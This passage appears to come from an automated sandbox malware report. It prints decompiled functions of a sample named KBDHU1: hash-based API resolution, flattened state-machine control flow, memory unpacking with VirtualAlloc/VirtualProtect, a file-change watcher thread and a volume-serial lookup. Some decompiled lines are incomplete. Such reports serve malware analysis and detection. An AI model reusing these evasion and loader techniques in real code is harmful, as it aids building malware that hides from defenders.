									_t22 =  !=  ? 1 : 0;
									return  !=  ? 1 : 0;
								} else {
									goto L5;
								}
							}
						}
						L20:
					}
					if(_t7 != 0x2ca09120) {
						goto L5;
					} else {
						_t9 =  *0x234de58;
						if(_t9 == 0) {
							_t9 = E02343E80(0, E02343F20(0xbb398380), 0xb1aefb5, _t45);
							 *0x234de58 = _t9;
						}
						 *_t9(0,  &_v520, 0x104);
						_t7 = 0x17e35087;
						goto L1;
					}
					goto L20;
					L5:
				} while (_t7 != 0x3e45350);
				return 0;
				goto L20;
			}

0x02349c10
0x02349c16
0x02349c1e
0x02349c20
0x02349c20
0x02349c20
0x02349c20
0x02349c25
0x00000000
0x00000000
0x02349c2b
0x02349cc9
0x00000000
0x02349c31
0x02349c36
0x02349c5c
0x02349c66
0x02349c80
0x02349c80
0x02349c86
0x02349c8e
0x02349ca6
0x02349ca8
0x02349ca8
0x02349cbd
0x02349cbf
0x00000000
0x02349c38
0x02349c3d
0x02349d1d
0x02349d24
0x02349d37
0x02349d3c
0x02349d3c
0x02349d4e
0x02349d58
0x02349d5c
0x02349d65
0x00000000
0x00000000
0x00000000
0x02349c3d
0x02349c36
0x00000000
0x02349c2b
0x02349cd8
0x00000000
0x02349cde
0x02349cde
0x02349ce5
0x02349cf8
0x02349cfd
0x02349cfd
0x02349d11
0x02349d13
0x00000000
0x02349d13
0x00000000
0x02349c43
0x02349c43
0x02349c55
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 02349CBA
QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 02349CBD

Strings

79V#, xrefs: 02349C72

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: Process$CurrentFullImageNameQuery
String ID: 79V#
API String ID: 2849609825-696535739
Opcode ID: 6e184aa495c099d6f257fa3c8e4e6262fd221e276b5ae53785227d05e707f489
Instruction ID: a42f1fa7e8c1bdf94c53fef7d634c8165a8d1eb91d3e8ba2884c61cc41408686
Opcode Fuzzy Hash: 6e184aa495c099d6f257fa3c8e4e6262fd221e276b5ae53785227d05e707f489
Instruction Fuzzy Hash: A631F7BAB052049BD734AA74A49076B22DAA7C4754F2409EAE441CB244EF75FD44CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 023499A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E023499A0() {
				short _v520;
				void* _v524;
				void* _v528;
				char _v532;
				void* _t11;
				intOrPtr* _t12;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr* _t25;
				intOrPtr* _t27;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr* _t38;
				intOrPtr _t41;
				void* _t45;
				intOrPtr* _t59;
				intOrPtr _t63;
				void* _t79;
				void* _t80;
				void* _t82;

				_t79 = _v528;
				_t11 = 0x1e395e13;
				while(1) {
					_t82 = _t11 - 0x1f18c325;
					if(_t82 > 0) {
						goto L24;
					}
					L2:
					if(_t82 == 0) {
						_t25 =  *0x234de58;
						if(_t25 == 0) {
							_t25 = E02343E80(_t45, E02343F20(0xbb398380), 0xb1aefb5, _t80);
							 *0x234de58 = _t25;
						}
						 *_t25(0,  &_v520, 0x104);
						_t27 =  *0x234dc3c;
						if(_t27 == 0) {
							_t27 = E02343E80(_t45, E02343F20(0x7539f5a2), 0x3f129d89, _t80);
							 *0x234dc3c = _t27;
						}
						 *((short*)( *_t27( &_v532))) = 0;
						_t11 = 0x32a2459b;
						continue;
					} else {
						if(_t11 == 0x3932e9b) {
							_t31 =  *0x234e2f0; // 0x32d23e0
							_t3 = _t31 + 0x3c; // 0x318
							_v528 =  *_t3;
							_t33 =  *0x234db04;
							_v524 = _t79;
							if(_t33 == 0) {
								_t33 = E02343E80(_t45, E02343F20(0xbb398380), 0x7436592b, _t80);
								 *0x234db04 = _t33;
							}
							_push(0xffffffff);
							_push(0);
							_push( &_v528);
							_push(2);
							if( *_t33() == 0) {
								L37:
								return 0;
							} else {
								_t11 =  ==  ? 0x18584b48 : 0x3932e9b;
								continue;
							}
						} else {
							if(_t11 == 0x18584b48) {
								if(E02349C10(_t80) == 0) {
									_t38 =  *0x234dcdc; // 0x0
									if(_t38 == 0) {
										_t38 = E02343E80(_t45, E02343F20(0xbb398380), 0xcaaeebbc, _t80);
										 *0x234dcdc = _t38;
									}
									 *_t38(_t79);
									L14:
									_t11 = 0x3932e9b;
								} else {
									_t59 =  *0x234dff4; // 0x0
									if(_t59 == 0) {
										_t59 = E02343E80(_t45, E02343F20(0xbb398380), 0x1186b083, _t80);
										 *0x234dff4 = _t59;
									}
									_t41 =  *0x234e2f0; // 0x32d23e0
									_t2 = _t41 + 0x3c; // 0x318
									 *_t59( *_t2);
									_t11 = 0x2713957b;
								}
								continue;
							} else {
								if(_t11 == 0x1e395e13) {
									_t11 = 0x1f18c325;
									continue;
									do {
										while(1) {
											_t82 = _t11 - 0x1f18c325;
											if(_t82 > 0) {
												goto L24;
											}
											goto L2;
										}
										goto L24;
									} while (_t11 != 0x2707225a);
									return 0;
								}
							}
						}
					}
					L38:
					L24:
					if(_t11 == 0x2713957b) {
						_t12 =  *0x234df90; // 0x0
						if(_t12 == 0) {
							_t12 = E02343E80(_t45, E02343F20(0xbb398380), 0x5f1f4281, _t80);
							 *0x234df90 = _t12;
						}
						 *_t12(_t79);
						goto L37;
					} else {
						if(_t11 != 0x32a2459b) {
							goto L32;
						} else {
							if( *0x234dca8 == 0) {
								 *0x234dca8 = E02343E80(_t45, E02343F20(0xbb398380), 0x39bd4dfe, _t80);
							}
							_t18 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
							_t79 = _t18;
							if(E02349C10(_t80) == 0) {
								goto L14;
							} else {
								_t20 =  *0x234dff4; // 0x0
								if(_t20 == 0) {
									_t20 = E02343E80(_t45, E02343F20(0xbb398380), 0x1186b083, _t80);
									 *0x234dff4 = _t20;
								}
								_t63 =  *0x234e2f0; // 0x32d23e0
								_t10 = _t63 + 0x3c; // 0x318
								 *_t20( *_t10);
								_t11 = 0x2713957b;
							}
							continue;
						}
					}
					goto L38;
				}
			}

0x023499a7
0x023499ab
0x023499c0
0x023499c0
0x023499c5
0x00000000
0x00000000
0x023499cb
0x023499cb
0x02349ac3
0x02349aca
0x02349add
0x02349ae2
0x02349ae2
0x02349af3
0x02349af5
0x02349afc
0x02349b0f
0x02349b14
0x02349b14
0x02349b22
0x02349b25
0x00000000
0x023499d1
0x023499d6
0x02349a68
0x02349a6d
0x02349a70
0x02349a74
0x02349a79
0x02349a7f
0x02349a92
0x02349a97
0x02349a97
0x02349a9c
0x02349a9e
0x02349aa4
0x02349aa5
0x02349aad
0x02349bf8
0x02349c01
0x02349ab3
0x02349abb
0x00000000
0x02349abb
0x023499dc
0x023499e1
0x023499fc
0x02349a37
0x02349a3e
0x02349a51
0x02349a56
0x02349a56
0x02349a5c
0x02349a5e
0x02349a5e
0x023499fe
0x023499fe
0x02349a06
0x02349a1e
0x02349a20
0x02349a20
0x02349a26
0x02349a2b
0x02349a2e
0x02349a30
0x02349a30
0x00000000
0x023499e3
0x023499e8
0x023499ee
0x023499f3
0x023499c0
0x023499c0
0x023499c0
0x023499c5
0x00000000
0x00000000
0x00000000
0x023499c5
0x00000000
0x023499c0
0x02349bcd
0x02349bcd
0x023499e8
0x023499e1
0x023499d6
0x00000000
0x02349b2f
0x02349b34
0x02349bd0
0x02349bd7
0x02349bea
0x02349bef
0x02349bef
0x02349bf5
0x00000000
0x02349b3a
0x02349b3f
0x00000000
0x02349b41
0x02349b48
0x02349b60
0x02349b60
0x02349b6e
0x02349b70
0x02349b79
0x00000000
0x02349b7f
0x02349b7f
0x02349b86
0x02349b99
0x02349b9e
0x02349b9e
0x02349ba3
0x02349ba9
0x02349bac
0x02349bae
0x02349bae
0x00000000
0x02349b79
0x02349b3f
0x00000000
0x02349b34

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 02349B6E

Strings

+Y6t, xrefs: 02349A8B

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: ChangeFindFirstNotification
String ID: +Y6t
API String ID: 1065410024-3949905484
Opcode ID: 13b2aa32e8ac298ef12b1f36557f061cc35d157120f12a4896e2081f277885f5
Instruction ID: a42dac614e35c98fd9e05c835c8358b56fa4ec2debbdd55e62aeed874d839338
Opcode Fuzzy Hash: 13b2aa32e8ac298ef12b1f36557f061cc35d157120f12a4896e2081f277885f5
Instruction Fuzzy Hash: 84517375B05201ABDB28EA65A89076B32EA9B84744F1049DEF842CB284EF70FD51CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 022E00B0, Relevance: 3.1, APIs: 2, Instructions: 113
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 022E0B88
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 022E0BBA
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 022E0BFB

RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 022E0129
VirtualProtect.KERNEL32(00000000,?,?,00000000,?,00000000,?,00000028,?,?,?,?,?), ref: 022E01A8

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: MemoryMove$ProtectVirtual
String ID:
API String ID: 4043890290-0
Opcode ID: 188b0fab12fc9e2f63dc8b0188fb47ecdf3ee1fa4a9327269660f04cd27d2570
Instruction ID: 04ae6678e1877f8e7b4d3d5be32733a3b7c1d0cca1e88e651e5fa5222c0cf8bd
Opcode Fuzzy Hash: 188b0fab12fc9e2f63dc8b0188fb47ecdf3ee1fa4a9327269660f04cd27d2570
Instruction Fuzzy Hash: 3A3148B327430517E724DAE8EC81BFBB3C5DB94714F94092AF902EA150D1BDD64AC2A1

Uniqueness

Uniqueness Score: -1.00%

Function 02345BC0, Relevance: 3.1, APIs: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E02345BC0(void* __ecx, void* __edx, void* __ebp) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __ebx;
				intOrPtr* _t3;
				void* _t6;
				intOrPtr* _t9;
				void* _t20;
				void* _t21;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				_t42 = __ebp;
				_t3 =  *0x234dea8;
				_t20 = __ecx;
				_t38 = __edx;
				if(_t3 == 0) {
					_t3 = E02343E80(_t20, E02343F20(0xbb398380), 0x97f883e, __ebp);
					 *0x234dea8 = _t3;
				}
				_t40 =  *_t3();
				if( *0x234dcec == 0) {
					 *0x234dcec = E02343E80(_t20, E02343F20(0xbb398380), 0xe9233692, _t42);
				}
				_t6 = RtlAllocateHeap(_t40, 8, 0x40000); // executed
				_t41 = _t6;
				if(_t41 == 0) {
					return 0;
				} else {
					_push(_t41);
					_push(_v0);
					_push(_v4);
					_t21 = E02345880(_t20, _t38);
					_t9 =  *0x234dea8;
					if(_t9 == 0) {
						_t9 = E02343E80(_t21, E02343F20(0xbb398380), 0x97f883e, _t42);
						 *0x234dea8 = _t9;
					}
					_t39 =  *_t9();
					if( *0x234e1a0 == 0) {
						 *0x234e1a0 = E02343E80(_t21, E02343F20(0xbb398380), 0x26c3f343, _t42);
					}
					RtlFreeHeap(_t39, 0, _t41); // executed
					return _t21;
				}
			}

0x02345bc0
0x02345bc0
0x02345bc6
0x02345bca
0x02345bce
0x02345be1
0x02345be6
0x02345be6
0x02345bed
0x02345bf6
0x02345c0e
0x02345c0e
0x02345c1b
0x02345c1d
0x02345c21
0x02345c97
0x02345c23
0x02345c23
0x02345c24
0x02345c2c
0x02345c35
0x02345c3a
0x02345c41
0x02345c54
0x02345c59
0x02345c59
0x02345c60
0x02345c69
0x02345c81
0x02345c81
0x02345c8a
0x02345c91
0x02345c91

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 02345C1B
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02345C8A

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: 15641bc718017f438ab3c4177a237fa83ac54b4d90b7288e06ce4d0e032543b4
Instruction ID: fa0231783df6a1ce9ce9871a5616ac660c051ce0d48914429f54ef6d7e97c7d3
Opcode Fuzzy Hash: 15641bc718017f438ab3c4177a237fa83ac54b4d90b7288e06ce4d0e032543b4
Instruction Fuzzy Hash: B811B6B6F422016FD724AAB5A89072B26DBEBD0794B5448F8F405CB340EE70ED524BD0

Uniqueness

Uniqueness Score: -1.00%

Function 022E0700, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 022E0B88
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 022E0BBA
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 022E0BFB

VirtualAlloc.KERNEL32(?,?,00000000), ref: 022E082F

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: MemoryMove$AllocVirtual
String ID:
API String ID: 1654584625-0
Opcode ID: 6f0421d4919e499df623a72a2ee0775d879b43e4296be54090a6b12650a6662d
Instruction ID: e19bdfb238a16bdda789b7de87b821939c1116ca48f713363ba14fcd8e3b7d00
Opcode Fuzzy Hash: 6f0421d4919e499df623a72a2ee0775d879b43e4296be54090a6b12650a6662d
Instruction Fuzzy Hash: C251D3B1650219AFDF208B94CC86FEA77A8EB44B00F404495F649B7190E7F49E85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02346FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E02346FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				intOrPtr _t28;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E02346F10(_t21, 0x234d770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02346F10(_t21, 0x234d7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E02346F10(_t21, 0x234d840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E02346F10(_t21, 0x234d820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E02346F10(_t21, 0x234d890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E023434C0(0x234d7f0);
							__eflags =  *0x234ddc4;
							if( *0x234ddc4 == 0) {
								 *0x234ddc4 = E02343E80(_t21, E02343F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51);
							_t28 =  *0x234e2e8; // 0x72c0e0
							 *(_t28 + 0x28) = _t5;
							_t6 =  *0x234dea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E02343E80(_t21, E02343F20(0xbb398380), 0x97f883e, _t53);
								 *0x234dea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x234e1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E02343E80(_t21, E02343F20(0xbb398380), 0x26c3f343, _t53);
								 *0x234e1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E02346F10(_t21, 0x234d870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E02346F10(_t21, 0x234d790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x02346fb0
0x02346fb0
0x02346fb0
0x02346fb5
0x02346fb5
0x02346fb5
0x02346fb5
0x02346fba
0x00000000
0x00000000
0x02346fc0
0x0234704a
0x0234704f
0x00000000
0x02346fc2
0x02346fc2
0x02346fc7
0x0234701c
0x02347021
0x00000000
0x02347027
0x02347031
0x02347036
0x00000000
0x02347036
0x02346fc9
0x02346fc9
0x02347010
0x02347015
0x00000000
0x02346fcb
0x02346fd0
0x02346ffa
0x02346fff
0x00000000
0x02346fd2
0x02346fd2
0x02346fd7
0x00000000
0x02346fdd
0x02346fe7
0x02346fec
0x00000000
0x02346fec
0x02346fd7
0x02346fd0
0x02346fc9
0x02346fc7
0x00000000
0x02346fc0
0x02347059
0x0234705e
0x023470a2
0x023470a7
0x00000000
0x023470a9
0x023470a9
0x00000000
0x023470a9
0x02347060
0x02347060
0x023470cb
0x023470d2
0x023470d4
0x023470ec
0x023470ec
0x023470f2
0x023470f4
0x023470fa
0x023470fd
0x02347102
0x02347104
0x02347117
0x0234711c
0x0234711c
0x02347123
0x02347125
0x0234712a
0x0234712c
0x0234713f
0x02347144
0x02347144
0x02347151
0x02347062
0x02347062
0x02347067
0x02347093
0x02347098
0x00000000
0x02347069
0x02347069
0x0234706e
0x00000000
0x02347070
0x0234707a
0x0234707f
0x00000000
0x0234707f
0x0234706e
0x02347067
0x02347060
0x00000000
0x023470b3
0x023470b3
0x023470b3
0x023470be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,023468DC), ref: 023470F2

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 41730a5e292cf2beddd1e3dbd7ab8599c9240fdf833d150a41ff8945f1912503
Instruction ID: c3a29a0bb8d22f7a08cd8b01f2b4b81fb1873151a11733c841a77968717599bd
Opcode Fuzzy Hash: 41730a5e292cf2beddd1e3dbd7ab8599c9240fdf833d150a41ff8945f1912503
Instruction Fuzzy Hash: F831D368B0620157DA386EA8549177B61DFD782B48F2409DEF482CB348CF65FC418FD2

Uniqueness

Uniqueness Score: -1.00%

Function 02349D70, Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02349D70(void* __ebx) {
				void* _t7;
				intOrPtr* _t8;
				intOrPtr* _t10;
				intOrPtr* _t16;
				intOrPtr _t17;
				void* _t20;
				void* _t25;
				intOrPtr _t27;
				void* _t40;
				void* _t41;

				_t25 = __ebx;
				_t7 = 0x94e9677;
				L1:
				while(_t7 != 0x94e9677) {
					if(_t7 == 0x11e89e6c) {
						_t16 =  *0x234dc9c;
						if(_t16 == 0) {
							_t16 = E02343E80(_t25, E02343F20(0xbb398380), 0x2a635a2, _t41);
							 *0x234dc9c = _t16;
						}
						_t17 =  *_t16(0, 0, 0, 0);
						_t27 =  *0x234e2f0; // 0x32d23e0
						 *((intOrPtr*)(_t27 + 0x3c)) = _t17;
						_t7 = 0x31494004;
						continue;
					} else {
						if(_t7 == 0x31494004) {
							if( *0x234de90 == 0) {
								 *0x234de90 = E02343E80(_t25, E02343F20(0xbb398380), 0x70a5bbfd, _t41);
							}
							_t20 = CreateThread(0, 0, E023499A0, 0, 0, 0);
							_t27 =  *0x234e2f0; // 0x32d23e0
							 *(_t27 + 0x34) = _t20;
							L18:
							return 0 | _t27 != 0x00000000;
						} else {
							if(_t7 != 0xf4b9f58) {
								continue;
							} else {
								return 0 | _t27 != 0x00000000;
							}
						}
					}
					L19:
				}
				_t8 =  *0x234dea8;
				if(_t8 == 0) {
					_t8 = E02343E80(_t25, E02343F20(0xbb398380), 0x97f883e, _t41);
					 *0x234dea8 = _t8;
				}
				_t40 =  *_t8();
				_t10 =  *0x234dcec;
				if(_t10 == 0) {
					_t10 = E02343E80(_t25, E02343F20(0xbb398380), 0xe9233692, _t41);
					 *0x234dcec = _t10;
				}
				_t27 =  *_t10(_t40, 8, 0x40);
				 *0x234e2f0 = _t27;
				if(_t27 == 0) {
					goto L18;
				} else {
					_t7 = 0x11e89e6c;
					goto L1;
				}
				goto L19;
			}

0x02349d70
0x02349d76
0x00000000
0x02349d80
0x02349d8c
0x02349da9
0x02349db0
0x02349dc3
0x02349dc8
0x02349dc8
0x02349dd5
0x02349dd7
0x02349ddd
0x02349de0
0x00000000
0x02349d8e
0x02349d93
0x02349e57
0x02349e6f
0x02349e6f
0x02349e83
0x02349e85
0x02349e8b
0x02349e8e
0x02349e96
0x02349d99
0x02349d9e
0x00000000
0x02349da0
0x02349da8
0x02349da8
0x02349d9e
0x02349d93
0x00000000
0x02349d8c
0x02349de7
0x02349dee
0x02349e01
0x02349e06
0x02349e06
0x02349e0d
0x02349e0f
0x02349e16
0x02349e29
0x02349e2e
0x02349e2e
0x02349e3a
0x02349e3c
0x02349e44
0x00000000
0x02349e46
0x02349e46
0x00000000
0x02349e46
0x00000000

APIs

CreateThread.KERNELBASE(00000000,00000000,023499A0,00000000,00000000,00000000), ref: 02349E83

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 482923f15b9f1964420d654bc5bf59a0a536d88ff2f780adb160b428c66f2c00
Instruction ID: f121ef6aaa476a12f869317c9119051b79c48aac11bb779607dc84863aef17be
Opcode Fuzzy Hash: 482923f15b9f1964420d654bc5bf59a0a536d88ff2f780adb160b428c66f2c00
Instruction Fuzzy Hash: 1A218674B413016BDB64AA759951B2A22DABB80B44F1448DEE506CB3C4EF70FC518BC5

Uniqueness

Uniqueness Score: -1.00%

Function 023446F0, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E023446F0(void* __ebx, void* __edx, void* __ebp) {
				char _v16;
				void* __ecx;
				intOrPtr* _t2;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr* _t7;
				void* _t14;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr* _t37;

				_t36 = __ebp;
				_t13 = __ebx;
				_t2 =  *0x234dea4;
				 *_t37 = 0x104;
				_t32 = _t14;
				_t27 = __edx;
				if(_t2 == 0) {
					_t2 = E02343E80(__ebx, E02343F20(0xbb398380), 0x4791debe, __ebp);
					 *0x234dea4 = _t2;
				}
				_t33 =  *_t2(0x1000, 0, _t32);
				if(_t33 == 0) {
					return 0;
				} else {
					_t5 =  *0x234df2c;
					if(_t5 == 0) {
						_t5 = E02343E80(_t13, E02343F20(0xbb398380), 0xd0ee7032, _t36);
						 *0x234df2c = _t5;
					}
					_t6 =  *_t5(_t33, 0, _t27,  &_v16); // executed
					_t29 = _t6;
					_t7 =  *0x234dc70;
					if(_t7 == 0) {
						_t7 = E02343E80(_t13, E02343F20(0xbb398380), 0x560d239b, _t36);
						 *0x234dc70 = _t7;
					}
					 *_t7(_t33);
					return _t29;
				}
			}

0x023446f0
0x023446f0
0x023446f1
0x023446f6
0x023446fe
0x02344701
0x02344705
0x02344718
0x0234471d
0x0234471d
0x0234472c
0x02344730
0x02344795
0x02344732
0x02344732
0x02344739
0x0234474c
0x02344751
0x02344751
0x0234475f
0x02344761
0x02344763
0x0234476a
0x0234477d
0x02344782
0x02344782
0x02344788
0x0234478f
0x0234478f

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,2564BE4F), ref: 0234475F

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: f29c4ded3306d3e3c603f8a2d3d4c2c934c30f962c512770e55b9b5e81765ae8
Instruction ID: 2abfa0334ef0c66ca38c0fbfa5ff1bd87f357961f033ae2849d339d31c92758c
Opcode Fuzzy Hash: f29c4ded3306d3e3c603f8a2d3d4c2c934c30f962c512770e55b9b5e81765ae8
Instruction Fuzzy Hash: 240196BAB022116BD724A6B9A810B6B26EBDBC5791F1409EDF555CB340EF70FC014BD0

Uniqueness

Uniqueness Score: -1.00%

Function 02345490, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02345490(void* __ebx, void* __ebp) {
				char _v520;
				short _v528;
				long _v532;
				intOrPtr* _t7;
				short* _t10;
				WCHAR** _t28;

				_t27 = __ebp;
				_t16 = __ebx;
				_t7 =  *0x234e1b8;
				 *_t28 = 0;
				if(_t7 == 0) {
					_t7 = E02343E80(__ebx, E02343F20(0xbb398380), 0x61bf6c0c, __ebp);
					 *0x234e1b8 = _t7;
				}
				_push(0x104);
				_push( &_v520);
				if( *_t7() != 0) {
					_t10 =  &_v528;
					if(_v528 != 0) {
						while( *_t10 != 0x5c) {
							_t10 = _t10 + 2;
							if( *_t10 != 0) {
								continue;
							} else {
							}
							goto L9;
						}
						 *((short*)(_t10 + 2)) = 0;
					}
					L9:
					if( *0x234e23c == 0) {
						 *0x234e23c = E02343E80(_t16, E02343F20(0xbb398380), 0x8837cb40, _t27);
					}
					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
				}
				return _v532;
			}

0x02345490
0x02345490
0x02345496
0x0234549b
0x023454a4
0x023454b7
0x023454bc
0x023454bc
0x023454c1
0x023454ca
0x023454cf
0x023454d7
0x023454db
0x023454e0
0x023454e6
0x023454ed
0x00000000
0x00000000
0x023454ef
0x00000000
0x023454ed
0x023454f3
0x023454f3
0x023454f7
0x023454fe
0x02345516
0x02345516
0x02345531
0x02345531
0x0234553c

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02345531

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

